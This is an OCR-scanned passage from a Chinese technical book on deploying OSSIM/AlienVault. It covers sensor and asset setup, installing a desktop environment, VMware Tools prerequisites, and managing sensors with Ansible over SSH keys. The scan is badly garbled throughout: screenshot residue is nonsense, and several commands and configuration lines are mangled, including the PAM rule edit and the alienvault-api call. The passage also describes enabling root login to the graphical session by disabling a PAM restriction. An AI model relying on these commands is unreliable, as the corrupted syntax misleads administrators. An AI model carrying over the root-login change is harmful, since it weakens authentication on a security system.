感 器 按钮 。 当 我 们 再 次 单 击 “Deployment status” 按 钮 时 ， 会 发 现 类 似 如 图 2-58 所 示 面 面 。 


waon. 
.| 


2-57 根据 具体 Sensor 的 位 置 添加 
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OOOOOO0O 


el 


Ca 10s emata Viney seame Fate imanan ee 


> Local_192_168_11_0_24 (192.168.11.0/24) 
Owner: My Company. 


sis ; zoe nemi (P 
sat ] C 
(DÀ 
[ arma 


[4m 


Ex 


图 2-58 传感器 状态 展示 


2.13.2 ”注意 事项 
这 里 需要 注意 ， 默 认 情况 下 在 Assets Visibility 下 的 Server 没有 选择 ， 该 图 标 为 灰色 ， 所 以 在 
配置 主机 时 就 必须 选择 设备 的 类 型 。 我 们 可 以 在 添加 资产 中 定义 (ADD HOST)， 如 图 2-59 所 示 。 


E Assets > pr 
Ciis Mm 


Name * 
[Foscr92-168-11-89 
IP Address * Location 

192.168.11.89 [Coa 16316 Valdemoro Sierra. Cuenca. AEF 


L choose nie 


FQDN/Aliases 


Asset Value * External Asset * 
[2 vi O Yes & No 


Sensors * 


L1 192.168.11.245 (sensor3) 
[192.168 11 218 (sensor 2) 
B 192.168.11.105 (VirtualUSMAllinOne] 
EZ 192.168.11.89 (ahenvauld 


Descnption Devices Types 
senes [server | [HTT server YI 
Thresholds * Scan options 


Cfo | Afo | B Avaitability monitoring 


2-59 选择 设备 类 型 
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如 果 在 系统 最 初 的 向 导 设 置 中 没有 定义 主机 和 设备 类 型 ， 那 么 在 上 图 这 个 页 面 上 
就 无 法 显示 。 如 果 错 过 了 最 初 设 置 向 导 ， 也 可 以 选择 “Unclassified Asset List” 进 行 再 
次 选择 。 

另外 ， 默 认 情况 下 “Vulnerability Scan Scheduled ”没有 设置 ， 系 统 用 红色 字体 标 出 ， 表 
示 需 要 用 户 设置 扫描 计划 。 在 标准 的 漏洞 管理 服务 中 , 需要 对 全 网 中 的 所 有 资产 进行 周期 性 的 
漏洞 扫描 ， 并 对 输出 结果 进行 格式 化 汇总 ， 从 而 对 用 户 提供 长 期 的 风险 分 析 。 显 然 单 次 漏洞 扫 
描 无 法 满足 要 求 ， 所 以 这 里 提示 用 户 设置 漏洞 扫描 计划 的 频率 。 


安装 桌面 环境 


默认 情况 下 ， 为 了 提高 性 能 OSSIM 不 提供 图 形 环境 ， 有 些 读 者 需要 比如 数据 库 查询 或 
图 形 化 分 析 日 志 的 需要 ) 安装 X-window 环境 ， 接 下 来 以 安装 Gnome 桌面 环境 举例 讲解 。 


2.14.1 安装 GNOME 环境 
Gnome 用 起 来 方便 而 且 安装 比较 简单 ， 推 荐 大 家 使 用 ， 方 法 是 执行 以 下 几 条 命令 : 
#alienvault-update 


#apt-get install gnome ( 约 1.22GB) 
#apt-get install xserver-xorg ( 约 15MB) 


安装 完成 后 还 需 调 整 gdm 配置 。 


2.14.2 ”安装 FVWM 环境 
由 于 FVWM 占用 内 存 少 ， 启 动 速度 快 等 特点 ， 深 受 不 少 用 户 喜爱 ， 其 安装 方法 如 下 : 


#apt-get install x-window-system-core fvwm 


执行 完 这 条 命令 EE BOSE S FR GL. 安装 X- Window 软件 集 如 果 是 从 OSSIM 
4.3 环境 下 安装 ， 下 载 容量 约 为 1.22GB， 需 要 确保 有 足够 的 解压 包 和 安装 包 的 空间 。 
下 载 时 间 就 要 看 您 的 网 络 带宽 大 小 ， 下 载 的 文件 放 在 /var/cache/apt/archives 目录 ， 接 
着 系统 会 解 包 安装 ， 然 后 重启 系统 ， 最 后 出 现 图 形 化 登录 窗口 。 这 时 会 发 现 无 论 普通 
用 户 ， 还 是 root 用 户 都 无 法 登录 Gnome 图 形 窗口 ， 我 们 还 需要 做 如 下 修改 ， 重 启 系 
统 并 进入 到 单 用 户 模式 。 如 图 2-60 Pros. 
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图 2-60 登录 界面 

新 版 OSSIM 4.8 无 法 进入 单 用 户 模式 ， 如 何 处 理 ? 首先 需要 赋予 grub.cfg 写 权 限 , 然后 按 
下 面 方法 修改 : 

#vi /boot/grub/grub.cfg 

将 52 行 “settimeout=0” 后 面 的 数字 0， 设 定 为 较 短 时 间 ， 比 如 5 秒 。 

解决 方法 是 在 GRUB 启动 界面 选择 Debian GNU/Linux,with Linux 2.6.32-5-amd64( recovery 
mode)， 回 车 开始 进入 单 用 户 模式 ， 如 图 2-61 所 示 。 

(or type control-D to continue) :输入 口令 


AL 
RlienVault Setup 


o 
i 
2 
3 
a 
[i 
5 
? 


2-61 退出 终端 模式 


选择 图 中 第 5 项 ， 进 入 “#” 提 示 符 。 进 入 单 用 户 模式 后 ， 开 始 修改 gdm3 下 的 配置 文件 。 
下 面 步骤 以 OSSIM 4.3 系统 为 例 进行 讲解 。 
启动 OSSIM 系统 , 如 果 不 加 任何 设置 , 以 root 登录 系统 会 提示 验证 失败 (因为 使 用 了 Pam 
认证 机 制 ，Pam 配置 默认 限制 了 root 账号 登录 )， 如 图 2-62 所 示 。 只 能 以 系统 普通 用 户 登录 ， 
下 面 修改 配置 文件 可 以 实现 root 直接 登录 。 
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(1) 修改 gdm3 配置 文件 。 
#vi /etc/pam.d/gdm3 


注销 下 面 这 行 : 

auth required pam succeed if.so user !- root quiet success 

经 过 以 上 步 操作 ， 即 允许 root 用 户 登录 图 形 界 面 。 此 方法 适用 Debian 6/7 系统 。 
finit 2 


#service gdm3 restart 
如 果 图 形 界面 出 现 假死 ， 如 何 处 理 呢 ? 可 以 通过 以 下 方法 解决 。 
首先 kill 掉 gdm3 进程 ， 然 后 再 启动 。 


#service gdm3 start 


E 如 果 在 OSSIM 23 系统 中 , 由 于 使 用 的 是 gdm, 所 以 只 要 修改 /etc/gdm/gdm.conf 在 security 
| 下 加 入 allowroot=true， 表 示人 允许 root 登录 。 


但 是 OSSIM 4.x 系统 使 用 了 gdm3， 那 么 修改 方式 发 生 了 变化 。 
(2) 删除 下 载 文件 。 
最 后 我 们 成 功 进入 gnome 桌面 系统 ， 记 得 删除 下 载 的 安装 deb 文件 。 


#rm /var/cache/apt/archives/*.deb 


如 果 习 惯 使 用 Red Hat Linux, 将 图 形 登 录 方 式 转换 为 字符 登录 的 方法 是 将 /etc/inittab 文件 
中 的 “id:5:initdefault” 中 的 5 换 成 3 即 可 。 但 对 于 OSSIM 系统 ( 它 是 基于 Debian Linux) 
| 就 不 那么 简单 ， 它 默认 启动 级 别 是 2， 图 形 启 动 级 别 也 是 2。 


假设 接 下 来 我 们 将 OSSIM 安装 在 Vware Workstations 虚拟 机 环境 ， 为 了 方便 使 用 图 形 化 
环境 ， 需 要 安装 Vmware-Tools。 如 果 遇 到 OSSIM 系统 默认 没有 GCC 环境 ， 这 时 如 果 直 接 安 
JE Vmware Tools 将 会 出 现 以 下 提示 〈 如 图 2-63 所 示 ) : 
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© Applications Places System Ò Sun Mar 


"Terminal 


Ele Edit View Terminal Help 


Making sure services for VMware Tools are stopped. 


Stopping Thinprint services in the virtual machine: 
Stopping Virtual Printing daemon: done 
Stopping VMware Tools services in the virtual machine: 


Guest operating system daemon: done 
Unmounting HGFS shares: done 
Guest filesystem driver: done 


illegal runlevel specified for vmware-tools-thinprint: r 
update-rc.d: using dependency based boot sequencing 

insserv: Service cups has to be enabled to start service vmware-tools-thinprint 
insserv: exiting now! 

update-rc.d: error: insserv rejected the script header 

WARNING: The installer initially used the 'udpate-rc.d' to setup the 
vmware-tools service. That command cannot be found. Please re-install the 
'sysv-rc' package. This script will now attempt to manually setup the 
vmware-tools service. 

Before you can compile modules, you need to have the following installed... 
make 

gcc 

kernel headers of the running kernel 

Searching for GCC... 


The path ** is not valid path to the gcc binary. 
would you like to change it? [yes] 


(Ej | 图 Terminal 
图 2-63 ”安装 Vmware Tools 失败 提示 


这 表明 系统 缺少 编译 工具 ，chkconfig 命令 是 Red Hat 公司 所 开发 的 程序 ， 它 可 查询 操作 
系统 在 每 一 个 执行 等 级 中 会 执行 哪些 系统 服务 ， 其 中 包括 各 类 常 驻 服务 。 在 OSSIM 系统 中 除 
了 有 这 款 工具 以 外 , 还 有 Debian 专用 的 update-rc.d 工具 ， 它 也 和 chkconfig 工具 类 似 , 不 同 的 
是 它 只 是 一 个 脚本 而 不 是 二 进 制程 序 。 

当 你 在 Debian Linux 下 安装 新 的 应 用 服务 器 时 ， 例 如 Apache2， 装 完 之 后 默认 它 会 启动 ， 
并 在 下 次 重启 后 自动 运行 ， 但 如 果 不 需 要 自动 启动 也 可 以 禁用 。 要 实现 这 个 目的 ， 有 个 方法 是 
手工 修改 /etc/rcx.d 目录 的 apache2 的 符号 连接 文件 ， 但 是 效率 较 低 ， 所 以 建议 使 用 update-rc.d 
命令 实现 。 


e 删除 一 个 服务 
#update-rc.d -f apache2 remove 


€ ”增加 一 个 服务 

#update-rc.d apache defaults 

在 OSSIM 系统 中 , 另外 一 个 管理 和 控制 服务 的 工具 是 invoke-rc.d， 它 和 Red Hat Linux 下 
的 service 和 ntsysv 工具 很 类 似 ， 更 多 使 用 方法 大 家 可 以 用 man 帮助 查询 。 在 OSSIM 下 通过 
安装 sysv-rc-conf 工具 ， 可 以 调整 命令 行 登录 和 图 形 化 登录 方式 。 


#apt-get install sysv-rc-conf  ”\\ 安 装 工 具 
#sysv-rc-conf 
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如 图 2-64 所 示 , 在 显示 界面 发 现 原来 Debian 默认 runlevel 2、3、4 和 5 级 都 是 图 形 界面 ， 
我 们 现在 选 runlevel 为 3， 去 掉 3 的 gdm。 


Ele gdt view Termnal Tabs Help 


Terminal X Terminal 


service 


fuse 

gdm3 

halt 
hdparm 
heartbeat 
ifrename 
1fupdown 
ifupdown-$ 
ipmievd 
irgbalance 
kbd 


图 2-64 配置 启动 服务 


2.14.3 ”安装 虚拟 机 

如 果 在 虚拟 机 中 安装 OSSIM， 同 时 安装 了 X-window， 默 认 的 分 辨 率 只 有 800X600， 为 
了 提高 分 辨 率 ， 还 需要 安装 虚拟 机 扩展 工具 ， 下 面 分 别针 对 两 款 常用 虚拟 机 进行 讲解 。 

对 于 在 VMware 下 安装 OSSIM， 为 了 扩展 需要 装 上 Vmware-tools， 需 用 到 apt-get 和 
apt-cache, uname 这 3 个 命令 。 

下 面 以 OSSIM 4.8 系统 为 例 。 


(1) 安装 GCC (在 OSSIM 5.X 之 后 的 版 本 已 安装 GCC) 
#apt-get install gcc 


alienvault:~# apt-get install gcc 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
gcc-4.4 
Suggested packages: 
gcc-multilib manpages-dev autoconf automakel.9 libtool flex bison gdb 
gcc-doc gcc-4.4-multilib libmudflapO-4.4-dev gcc-4.4-doc gcc-4.4-locales 
libgcci-dbg libgompl-dbg libmudflapO-dbg libcloog-pplO libppl-c2 libppl7 
The following NEW packages vill be installed: 
gcc gcc-4.4 
O upgraded, 2 newly installed, O to remove and 2 not upgraded. 
2 not fully installed or removed. 
Need to get 2693 kB of archives. 
After this operation, 4567 kB of additional disk space will be used. 
Do you want to continue [Y/n]? y 
Get:1 http://data.alienvault.com/mirror/squeeze/ squeeze/main gcc-4.4 amd64 4.4. 
5-8 [2688 kB] 
O^ [1 acc-4.4 2491 B/2688 kB 0%] 


(2) 安装 header-dev 
再 查看 系统 版 本 : 


funame -r 
2.6.32-5-amd64 
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查看 内 核 头 文件 位 置 : 


#apt-cache search headers 2.6.32-5-amd64 
linux-headers-2.6.32-5-amd64 - Header files for Linux 2.6.32-5-amd64 


开始 安装 linux-headers: 
#apt-get install linux-headers-2.6.32-5-amd64 


Linux alienvault 2.6.32-5-amd64 #1 SMP Fri May 10 08:43:19 UTC 2013 x86 64 GNU/L 
inux 
alienvault:-& uname -r 
2.6.32-5-amd64 
alienvault:~# apt-cache search headers 2.6.32-5-amd64 
- Header files for Linux 2.6.32-5-amd64 
alienvault:-£ apt-get install linux-headers-2.6.32-5-amd64 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
Cpp-4.3 gcc-4.3 gcc-4.3-base linux-headers-2.6.32-5-common 
linux-kbuild-2.6.32 
Suggested packages: 
gcc-4.3-locales gcc-4.3-multilib libmudflapO-4.3-dev gcc-4.3-doc libgcc1-dbg 
libgompl-dbg libmudflapO-dbg 
The following NEW packages will be installed: 
Cpp-4.3 gcc-4.3 gcc-4.3-base linux-headers- 2.6.32-5- amd64 
linux-headers-2.6.32-5-common linux-kbuild-2.6.32 
O upgraded, 6 newly installed, O to remove and 2 not upgraded. 
2 not fully installed or removed. 
Need to get 10.7 MB of archives. 
After this operation, 35.3 MB of additional disk space will be used. 
Do you want to continue [Y/n]? 


以 上 准备 工作 做 完 ， 接 着 可 以 正常 安装 上 VMware Tools 工具 。 


VM communication interface: done 
VM communication interface socket family: done 
Guest filesystem driver: done 
Mounting HGFS shares: failed 
Blocking file system: done 
Guest operating system daemon: done 
Virtual Printing daemon: done 


The configuration of VMware Tools 8.8.0 build-471268 for Linux for this running 
kernel completed successfully. 


You must restart your X session before any mouse or graphics changes take 
effect. 


You can now run VMware Tools by invoking "/usr/bin/vmware-toolbox-cmd" from the 
command line or by invoking '/usr/bin/vmware-toolbox' from the command line 
during an X server session. 

To enable advanced X features (e.g., guest resolution fit, drag and drop, and 
file and text copy/paste), you will need to do one (or more) of the following: 
1. Manually start /usr/bin/vmware-user 

2. Log out and log back into your desktop session; and, 

3. Restart your X session. 

Enjoy, 


--the VMWare team 


成 功 安装 VMwareTools 后 对 于 调试 使 用 OSSIM 非常 有 利 。 
注意 ， 如 果 选 用 了 Oracle VirtualBox 虚拟 机 安装 OSSIM， 则 应 在 VirtualBox 程序 中 Devices 菜 
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单 下 选择 “InsertGuestAdditions CD image”。 这 时 在 虚拟 机 中 的 图 形 界面 会 打开 VBOXADDITIONS 
虚拟 光盘 ， 我 们 将 所 有 目录 和 文件 复制 到 /tmp 后 ， 然 后 运行 /VBoxLinuxAdditions.run， 并 根据 提示 
安装 即 可 ， 这 样 即 可 在 OSSIM 桌面 环境 下 支持 高 分 辨 率 。 


自动 化 配置 管理 工具 Ansible 


从 事 Hadoop 集群 安装 时 ， 需 要 在 每 个 节点 上 配置 SSH， 以 实现 节点 之 间 的 无 密码 接 入 。 
下 面 要 介绍 的 一 款 基 于 Python 开源 工具 Ansible， 它 也 是 和 SSH 连接 密切 相关 ， 它 利用 推送 
方式 对 客户 系统 加 以 配置 ， 这 样 所 有 工作 都 可 在 服务 器 端 完成 。 利 用 SSH 互信 ， 这 样 就 无 须 
安装 客户 端 ， 特 别 适 用 于 分 布 式 系统 的 管理 ， 可 以 使 用 Web UI 实现 授权 管理 与 配置 ， 下 面 我 
们 先 看 看 它 的 优点 : 

© 无 须 部 署 代理 ， 基 于 SSH Key 方式 认证 ， 不 需要 在 被 管控 主机 上 安装 任何 客户 端 软 

件 (包括 插件 ) ， 也 不 需要 配置 数据 库 。 
@ 无 须 服务 器 ， 不 用 服务 器 直接 使 用 命令 。 
€ ”使 用 Python 编写 ， 维 护 简单 ， 而 且 基 于 模块 化 工作 机 制 ， 便 于 扩展 。 


在 OSSIM 中 集成 Ansible 软件 包 名 称 为 alienvault-api-core, 这 是 OSSIM 核心 安装 包 之 一 


2.15.4 SSH 的 核心 作用 

借助 SSH 我 们 可 以 在 远程 主机 上 执行 命令 并 读 取 输出 .SSH 使 用 用 户 名 和 密码 进行 认证 。 
在 SSH 命令 的 执行 过 程 中 提示 输入 密码 。 但 是 在 自动 化 脚本 中 ，SSH 命令 可 能 在 一 个 循环 中 
执行 多 次 ， 每 次 都 提供 密码 的 话 ， 显 然 不 实际 。 因 此 ， 我 们 需要 将 登录 过 程 自 动 化 。 解 决 方式 
是 可 以 用 SSH 密 钥 实 现 自动 登录 。 

当中 心 控制 服务 器 与 远程 机 器 通信 时 ，Ansible 默认 使 用 SSH Keys 方式 通信 ， 例 如 ,在 
OSSIM Web UI 中 , 我 们 在 Alienvault Center 可 查看 到 Sensor 的 各 项 性 能 参数 。 如 图 2-65 所 示 。 


COMPONENTS 


ALIENVAULTCENTER | SENSORS | SERVERS 


A ALIENVAULTCENTER — ALIENVAULT [192.163.91.225] 


© system Status a 
RATON 


图 2-65 查看 Sensor 状态 
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SSH X 
和 一 个 私 钥 。 可 以 通过 “ssh-keygen” 命 令 创建 认证 密 钥 。 要 


基于 公 钥 和 私 钥 的 加 密 技术 进行 自动 化 认证 。 认 证 密 钥 包 含 两 部 分 : —4 A48 
: 现 自 动 化 认证 ， 公 钥 必 须 放置 


在 OSSIM 服务 器 中 (将 其 加 入 文件 /home/avapi/.ssh/authorized_keys， 该 文件 中 包含 了 公 钥 


id_rsa.pub 的 内 容 )。 以 avapi 用 户 直接 访问 远程 
如 果 想 了 解 通过 SSH 协议 连接 


星 ， 可 输入 “ssh -vvv 192.168.91.225”。 


ding configuration data 
: Applying options for * 
: Connecting to 192.168.91.225 [192.168.91.225] port 22 
Connection established 
pernanently set uid: 07/0 
ntity file /var/ossin cal/pri akey.pem type 
e/cakey.pen-c 
yte software version ÜpenS: 


otocol 
1 5.5p1 Debian-6*squ 


Fd 2-66 以 avapi 用 户 直接 访问 远程 主机 
接着 ， 执 行 以 下 命令 〈 结 果 如 图 2-67 所 示 ): 


# /usr/share/alienvault/api core/bin/ansible-playbook -e 
"remote system ip-10.32.14.10 local system id-«System ID»" 
/etc/ansible/playbooks/auth/set crypto files.yml -vvvv 


«System ID> 是 服务 器 的 UUID， 通 过 执行 “alienvault-api about” 命 令 获取 。 
“vvvv” 代 表 输 出 调试 信息 。 


alienvault:/etc/ansible# /usr/share/alienvault/api_core/bin/ansible-playbook -e 
"remote_system_ip=192.168.91.225 local system id-564df90b-6ca3-f88b-7c2b-91ee2d6| 
42142" etc/ansible/playbooks/auth^set cruypto files.yml -uuuu 


PLAY [set crypto files] 


GATHERING FACTS 
¢192.168.91.225> ESTABLISH CONNECTION FOR USER: avapi 
^, , StrictHostKeyChecking-no" 93 
^-o', 'IdentityFile- 7var/ossim 
"KbdInteractiuefiuthentication-no', '-| 
ssap uithe mic, gssapi-keyex,hostbased,publickey’ , 
» 'Passuordfuthentication-no', '-o', 'User-auapi', '-o', 'ConnectTineout-10| 
192.168.91.225', "^bin/sh -c 'nkdir -p $HOME/ .ansible/tnp/ansible-1432025867| 
.73-156347916334100 && chmod a*rx SHÜME^.ansible/tmp/ansible-1432025867 .73-15634| 
916334100 && echo SHOME/.ansible^tmp/ansible-1432025867 .73-156347916334100' "1 
192.168.91.225» REMOTE MODULE setup 
192.168.91.225» PUT /tmp/tmp_bUNbn TO ^/honme/avuapi^.ansible/tmp^/ansib1e-14320258| 
67 .73-156347916334100/setup 
K192.168.91.225» EXEC I'ssh', '-tt', '-uuv', 'StrictHostKeyChecking-no', ' 
0', 'StrictHostKeuChecking-no', '-o', 'Port-22', '-o', 'IdentityFile-^uar/ossim 


2-67 ansible-playbook 命令 执行 结果 


机 192.168.91.225， 其 过 程 如 图 2-66 所 示 。 


该 脚本 ， 当 执行 到 “get remote system id” 这 一 步 时 很 乙 ， 大 约 经 过 几 分 钟 才 完成 。 执 行 


142 


第 2 章 OSSIM 部 署 与 安装 
过 程 中 可 以 按 Ctrl+C 终止 。 


2.15.2 Ansible 配置 

在 OSSIM 系统 中 ,ansible 配置 文件 位 于 /etc/ansible/ansible.cfg, 其 中 Hostfile-/etc/ansible/hosts 
指定 默认 hosts 配置 的 IP 地 址 , 该 IP 是 分 布 式 OSSIM 系统 中 的 Sensor 主机 IP. 另外, Ansible 
二 进 制 命令 默认 不 能 在 命令 行 下 执行 ， 建 议 大 家 输入 完整 路 径 。 


2.15.3 Ansible 实战 
下 面 我 们 在 OSSIM 环境 下 ， 通 过 几 个 命令 测试 存活 的 Sensor 主机 。 
CD 向 远程 主机 执行 第 一 条 命令 
读者 对 于 这 个 命令 和 加 载 模块 不 理解 , 暂时 没有 关系 , 不 影响 实验 。 首先 输入 下 面 命令 (如 
图 2-68 所 示 ): 
# /usr/share/alienvault/api core/bin/ansible all -m ping 
lienuault:^t ^/usr^share/alienuault^/api core/bin^ansible all -m ping 
1.223 | success >> { 


g : false, 
"ping": "pong" 


} 


图 2-68 ”向 远程 主机 执行 ping 命令 
如 收 到 响应 ， 则 说 明 远程 主机 存活 。 如 果 想 对 远程 机 器 进行 管理 ， 那 么 首先 需要 将 远程 机 
器 的 主机 名 或 IP A Ansible 清单 文件 /etc/ansible/hosts 中 ,在 Ansible 中 称 其 为 清单 文件 ， 
里 面包 含 了 所 有 要 管理 的 机 器 。 该 文件 中 的 内 容 一 般 是 在 你 添加 Sensor 过 程 中 自动 完成 。 注 
意 : 如 果 启 用 密码 验证 ， 则 使 用 “--ask-pass” 选 项 ， 例 如 (如 图 2-69 所 示 ): 


# /usr/share/alienvault/api core/bin/ansible all -m ping --ask-pass 


图 2-69 向 远程 主机 执行 ping 命令 
接 下 来 ， 我 们 需要 获取 远程 主机 运行 时 间 、 在 线 用 户 平均 负载 等 信息 ， 继 续 输 入 命令 : 
# /usr/share/alienvault/api core/bin/ansible all -m raw -a 'w' 


运行 效果 如 图 2-70 所 示 。 
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sh# /usr/share/alienvault/api_core/bin/ansible all -m rau -a 'u* 
1 rc=0 


load average: 0.01, 0.10, 0.16 
FROM LOGIN@ IDLE  JCPU PCPU WHAT 


localhost .alienu 0.00s 0.00s 0.00s v 


rc=0 
load average: 0.01, 0.02, 0.00 
LOGING IDLE PU 。 PCPU WHAT 
10.00. 1.23 0.03: bin/bash 
0.00s 0.00s 0.00s u 


图 2-70 ”获取 远程 主机 运行 时 间 信息 
瞧 ， 对 方 并 没有 提示 输入 密码 。Ansible 是 基于 模块 的 应 用 ， 通 过 实现 设 定 的 模块 来 完成 
- 些 远程 管理 工作 ，Ansible 模块 众多 A 180 个 )， 要 查看 可 用 的 模块 ， 可 以 使 用 指令 
“ansible-doc 1". 
(2) 查看 远程 主机 基本 信息 
#/usr/share/alienvault/api core/bin/ansible all -m setup 
该 命令 输出 非常 丰富 ， 读 者 自己 可 以 在 实验 机 上 执行 一 下 看 看 。 测 试 远程 主机 运行 状态 
如 下 : 
#/usr/share/alienvault/api_ core/bin/ansible all -m ping 
(3) 远程 创建 文件 符号 链接 
远程 创建 文件 符号 链接 命令 执行 结果 如 图 2-71 所 示 。 


lienvault:™/.ssh# /usr/share/alienvault/api_core/bin/ansible all -m file -a “sr 
link” 


false, 


p/resolu.conf" 


"/etc/resolu.conf", 
"link", 


图 2-71 创建 符号 连接 
选项 “sre” 表 示 被 赋值 到 远程 主机 的 本 地 文件 ， 注 意 是 绝对 路 径 。 如 果 是 目录 ， 将 递归 
赋值 。 
选项 “dest” 表 示 要 将 源 文件 复制 到 的 远程 主机 的 绝对 路 径 。 如 果 源 文件 是 目录 ， 那 么 该 
路 径 也 必须 为 目录 。 


(4) 远程 文件 信息 查看 举例 (如 图 2-72 所 示 ) 
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alienuvault:^7.sshtt /usr^share/alienvault/api core^/bin/ansible all -m file -a "ls| 
-la 7tmp^resolu.conf 


192.168.91.223 | FAILED >> t€ 

"failed": true, 

"msg": "this module requires key-value arguments ([’ ls’, '-la', '7tmp^resolu| 
.conf' 1) 
U 


192.168.91.224 | FAILED >> t€ 

failed”: true, 

"msg": "this module requires key-value arguments (I'ls', '-la', '^tmp/resolu| 
.conf' 1) 
U 


alienuault:7/.sshit 
图 2-72 ”查看 远程 文件 


执行 完 这 条 命令 ， 我 们 看 看 本 地 /tmp 目录 下 发 生 的 变化 ， 如 图 2-73 所 


alienvault:/tmp# ls —1 
total 4 


ru-r-—r-- 1 root root 3924 Mar 3 01 monit .state 


lruxrwxrux 1 auapi alienuault 16 Mar 3 01:24 resolu.conf -> 7e esolu .conf 


alienvau lt : /tmpt 


图 2-73 观察 符号 连接 文件 
5) 删除 远程 文件 符号 链接 
删除 远程 文件 符号 链接 命令 执行 结果 如 图 2-74 所 示 。 


lienvault:^7.sshtt /usr7share/alienvault/api core7bin/ansible all -m file -a "pa 
h-^tmp^resolu.conf state-absent" 
192.168.91.223 | success >> € 


1 success >> € 
true, 
/tnp/resolu conf", 


lienvault:^7.sshtt 


图 2-74 删除 符号 连接 


C6) 在 远程 主机 上 执行 命令 uptime 
远程 主机 上 执行 命令 uptime， 结 果 如 图 2-75 所 示 。 
lienvault:“/,ssh# /usr/share/alienvault/api_core/bin/ansible all -m raw -a "upt| 
192.168.91.223 1 success | rc-0 >> 
01:46:00 up 3:31, 4 users, load average: 0.08, 0.10, 0.11 


192.168.91.224 | success | rc=9 >> 
01:46:01 up 2:27, 2 users, load average: 0.33, 0.10, 0.03 


lienvault:^/.sshtt 


图 2-75 执行 uptime 
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将 上 面 命令 中 的 “raw” 参 数 蔡 换 成 command 同样 可 以 。 
(7) 复杂 操作 一 一 将 脚本 分 发 到 远程 主机 并 执行 
远程 部 署 脚本 可 以 实现 批量 配置 和 程序 部 署 ， 注 意 的 是 ，ansible 本 身 并 不 能 批量 装 在 多 
个 机 器 上 ， 这 里 指 它 可 以 通过 ansible 运行 的 模块 提供 一 种 框架 ， 以 实现 批量 部 署 。 下 面 看 个 
例子 来 体会 一 下 , 在 整个 过 程 中 需要 输入 用 户 名 和 密码 吗 ? 不 用 每 段 过 程 都 
立 如 下 脚本 testsh， 如 图 2-76 所 示 。 
将 脚本 分 发 到 远程 Sensor， 如 图 2-77 所 示 。 


- 气 呵 成 。 首 先 建 


192.168.91.224 | FAILED >> € 
"fai rue, 


,Atest .sh 


lienuault:^/.sshtt chmod +x 
: “vtmpvtest.sh"， 


zS 


IESU 
图 2-76 建立 测试 脚本 图 2-77 分 发 脚本 


远程 执行 脚本 ， 如 图 2-78 所 示 。 


lienuault: .ssh# /usr/share/alienvault/api_core/bin/ansible -m shell all -a "/| 


mp/test .sh” 
192 .168.91.223 | success | rc-0 >> 


[2015-03-03 02:12:07 


192.168.91.224 | success | rc=0 >> 
[2015-03-03 02:12:07 


图 2-78 执行 脚本 
下 面 接着 分 析 SSH/Ansible 在 OSSIM 下 是 如 何 发 挥 作用 的 , 我们 在 OSSIM Server 下 做 如 
下 实验 ， 注 意 这 个 实验 是 为 了 理解 它们 之 间 的 关系 和 作用 ， 不 要 在 上 线 系统 进行 该 项 实验 。 


CL). 删除 tmp 临时 目录 及 文件 。 


# rm -R /root/.ansible/tmp/* 
# rm -R /home/avapi/.ansible/tmp/* 


(2) 产生 新 的 rsa。 
# ssh-keygen -t rsa 


默认 会 保存 到 /root/.ssh/id_rsa。 


# ssh avapi@192.168.11.100 mkdir -p .ssh \\ 注 意 后 面 使 用 主机 名 称 


(3) 为 avapi 用 户 创建 密码 。 


#passwd avapi 
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(4) 复制 密 钥 。 
# cat /root/.ssh/id rsa.pub | ssh avapi@192.168.11.100 'cat 
>> .ssh/authorized keys' 


C5) 执行 ssh avapi()192.168.11.100. 
(6) 执行 ossim-reconfig。 
(7) 执行 alienvaultrapi add. system --system-ip-XX.XX.XX.XX --password=XXXXXX。 


2.15.4 ”丰富 的 模块 
其 他 常用 模块 包括 service C 系统 服务 管理 )、 cron (计划 任务 管理 )、synchronize (使 用 rsync 
同步 文件 )、user (系统 用 户 管理 ) 等 ， 详 细 内 容 大 家 可 以 通过 以 下 命令 了 解 。 


#/usr/share/alienvault/api_core/bin/ansible-doc -1 


2.15.5 ”Ansible 与 其 他 配置 管理 的 对 比 
笔者 列举 了 目前 几 款 主流 的 、 与 Ansible 功能 类 似 的 配置 管理 软件 Puppet， 这 里 所 做 的 对 
比 不 针对 各 个 软件 的 性 能 作 比 较 ， 只 是 对 各 个 软件 的 特性 做 比较 。 具 体内 容 如 表 2-7 所 示 。 


表 2-7 Ansible 与 puppet 对 比 


比较 项 目 Puppet Ansible 
E 
| 服务 器 与 远 程 机 器 是 否 相 验证 ”| 是 [gg | 


SIEM 控制 台 基 础 


无 论 OSSIM 的 版 本 如 何 发 展 ，SIEM 控制 台 分 析 是 基础 。 下 面 从 SIEM 分 析 方 法 开始 讲 
起 ，SIEM 事件 控制 台 位 于 ANALYSIS 一 SECURITY EVENTS (SIEM) 菜单 ， 如 图 2-79 所 示 。 
SIEM 控制 台 是 基于 事件 数据 库 的 搜索 引擎 ， 能 够 让 管理 人 员 用 更 加 集中 的 方式 ， 针 对 整个 系 
统 的 安全 状态 进行 分 析 。 
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20130318191405 102326376 10232075 [7373 $3) m Sever Mum CRM 


图 2-79  OSSIM 4.8 SIEM 控制 面板 


2.16.1 SIEM 控制 台 日 志 过 滤 技巧 
在 OSSIM 的 SEIM 控制 台中 可 以 显示 大 量 日 志和 报警 ， 从 整体 数量 上 看 占据 前 三 甲 的 包 


括 OSSEC, Syslog 收集 的 各 类 日 志 以 及 Snort 事件 (网 络 数 据 包 深度 分 析 )， 其 他 事件 的 过 滤 
可 以 通过 选择 Data Sources 实现 ， 如 图 2-80 所 示 。 


SYSLOG 
B£ 


ossec w Snort 
事件 报警 V A / ny 
PT. 


图 2-80 SIEM 事件 主要 构成 
在 事件 列表 最 下 方 有 三 个 重要 参数 需要 大 家 理解 : 
(1) priority threshold: 优先 级 阔 值 。 
(2) Active eventWindows (days): 事件 被 存储 在 指定 的 空间 ， 称 为 活动 时 间 窗 口 ， 表 示 
你 可 以 在 SIEM 控制 台 里 查询 到 的 时 间 , 一 般 是 5 天 内 ,企业 版 中 时 间 更 长 ， 即 提供 在 线 查 询 


的 保存 天 数 ， 如 果 超 过 5 天 的 事件 将 自动 归档 到 磁盘 中 ， 也 可 以 从 归档 文件 恢复 到 数据 库 中 ， 
保存 为 SQL 文件 。 


(3) Active event windows(events): 在 上 一 条 中 定义 了 查询 时 间 ， 这 里 定义 了 窗口 中 事件 
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的 数量 为 4M 条 ， 也 就 是 4X10 条。 通过 调度 任务 系统 ， 将 旧 的 时 间 从 数据 库 中 写 入 到 磁盘 ， 
当然 也 可 以 从 SQL 文件 中 恢复 某 时 段 的 事件 。 
